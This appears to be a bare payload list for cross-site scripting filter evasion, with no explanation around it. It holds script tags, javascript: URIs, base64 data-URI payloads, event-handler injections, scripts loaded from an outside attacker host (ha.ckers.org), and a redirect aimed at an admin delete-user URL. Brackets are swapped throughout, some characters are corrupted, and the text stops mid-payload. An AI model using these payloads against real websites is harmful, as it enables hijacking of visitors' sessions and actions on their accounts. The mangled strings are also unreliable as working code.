alert(123) alert("hellox worldss"); javascript:alert("hellox worldss")
[script]alert[123][/script] [script]alert["hellox worldss"];[/script] javascript:alert["hellox worldss"] [img src="javascript:alert['XSS'];"] [img src=javascript:alert["XSS"]] ["';alert[String.fromCharCode[88,83,83]]//';alert[String.fromCharCode[88,83,83]]//";alert[String.fromCharCode[88,83,83]]//";alert[String.fromCharCode[88,83,83]]//--][/SCRIPT]"]'][SCRIPT]alert[String.fromCharCode[88,83,83]][/SCRIPT] [META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"] [IFRAME SRC="javascript:alert['XSS'];"][/IFRAME] [EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"][/EMBED] [SCRIPT a="]" SRC="http://ha.ckers.org/xss.js"][/SCRIPT] [SCRIPT a="]" '' SRC="http://ha.ckers.org/xss.js"][/SCRIPT] [SCRIPT "a=']'" SRC="http://ha.ckers.org/xss.js"][/SCRIPT] [SCRIPT a="]']" SRC="http://ha.ckers.org/xss.js"][/SCRIPT] [SCRIPT]document.write["[SCRI"];[/SCRIPT]PT SRC="http://ha.ckers.org/xss.js"][/SCRIPT] [[SCRIPT]alert["XSS"];//[[/SCRIPT] ["';alert[String.fromCharCode[88,83,83]]//';alert[String.fromCharCode[88,83,83]]//";alert[String.fromCharCode[88,83,83]]//";alert[String.fromCharCode[88,83,83]]//--][/SCRIPT]"]'][SCRIPT]alert[String.fromCharCode[88,83,83]][/SCRIPT] ';alert[String.fromCharCode[88,83,83]]//';alert[String.fromCharCode[88,83,83]]//";alert[String.fromCharCode[88,83,83]]//";alert[String.fromCharCode[88,83,83]]//--][/SCRIPT]"]'][SCRIPT]alert[String.fromCharCode[88,83,83]][?/SCRIPT]&submit.x=27&submit.y=9&cmd=search [script]alert["hellox worldss"][/script]&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510 [script]alert["XSS"];[/script]&search=1 0&q=';alert[String.fromCharCode[88,83,83]]//';alert%2?8String.fromCharCode[88,83,83]]//";alert[String.fromCharCode?[88,83,83]]//";alert[String.fromCharCode[88,83,83]%?29//--][/SCRIPT]"]'][SCRIPT]alert[String.fromCharCode[88,83%?2C83]][/SCRIPT]&submit-frmGoogleWeb=Web+Search [h1][font color=blue]hellox worldss[/h1] [BODY ONLOAD=alert['hellox worldss']] [input onfocus=write[XSS] autofocus] [input onblur=write[XSS] autofocus][input autofocus] [body onscroll=alert[XSS]] ... [input autofocus] [form][button formaction="javascript:alert[XSS]"]lol [!--[img src="--][img src=x =alert[XSS]//"] [![][img src="]][img src=x =alert[XSS]//"] [style][img src="[/style][img src=x =alert[XSS]//"] [? foo="][script]alert[1][/script]"] [! foo="][script]alert[1][/script]"] [/ foo="][script]alert[1][/script]"] [? foo="][x foo='?][script]alert[1][/script]']"] [! foo="[[[Inception]]"][x foo="]foo][script]alert[1][/script]"] [% foo][x foo="%][script]alert[123][/script]"] [div style="font-family:'foo ;color:red;';"]LOL LOL[style]*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}[/style] [script][{0:#0=alert/#0#/#0#[0]}][/script] [svg xmlns="http://www.w3.org/2000/svg"]LOL[script]alert[123][/script][/svg] alert[/XSS/.source] ";alert['XSS'];// alert["XSS"]; @import'http://ha.ckers.org/xss.css'; BODY{-moz-binding:url["http://ha.ckers.org/xssmoz.xml#xss"]} li {list-style-image: url["javascript:alert['XSS']"];}XSS ûscriptualert[EXSSE]û/scriptu a="get"; b="URL[""; c="javascript:"; d="alert['XSS'];"]"; eval[a+b+c+d]; Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser +ADw-SCRIPT+AD4-alert['XSS'];+ADw-/SCRIPT+AD4- ` SRC="http://ha.ckers.org/xss.js"> document.write["alert["XSS"]"> '';!--"=&{[]} ';alert[String.fromCharCode[88,83,83]]//';alert[String.fromCharCode[88,83,83]]//";alert[String.fromCharCode[88,83,83]]//";alert[String.fromCharCode[88,83,83]]//-->">'>alert[String.fromCharCode[88,83,83]] ';alert[String.fromCharCode[88,83,83]]//';alert[String.fromCharCode[88,83,83]]//";alert[String.fromCharCode[88,83,83]]//";alert[String.fromCharCode[88,83,83]]//--][/SCRIPT]"]'][SCRIPT]alert[String.fromCharCode[88,83,83]][/SCRIPT] '';!--"[XSS]=&{[]} [SCRIPT SRC=http://ha.ckers.org/xss.js][/SCRIPT] [IMG SRC="javascript:alert['XSS'];"] [IMG SRC=javascript:alert['XSS']] [IMG SRC=javascrscriptipt:alert['XSS']] [IMG SRC=JaVaScRiPt:alert['XSS']] [IMG """][SCRIPT]alert["XSS"][/SCRIPT]"] [IMG SRC=" javascript:alert['XSS'];"] [SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"][/SCRIPT] [SCRIPT/SRC="http://ha.ckers.org/xss.js"][/SCRIPT] [[SCRIPT]alert["XSS"];//[[/SCRIPT] [SCRIPT]a=/XSS/alert[a.source][/SCRIPT] ";alert['XSS'];// [/TITLE][SCRIPT]alert["XSS"];[/SCRIPT] ºscriptæalert[¢XSS¢]º/scriptæ [META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert['XSS'];"] [IFRAME SRC="javascript:alert['XSS'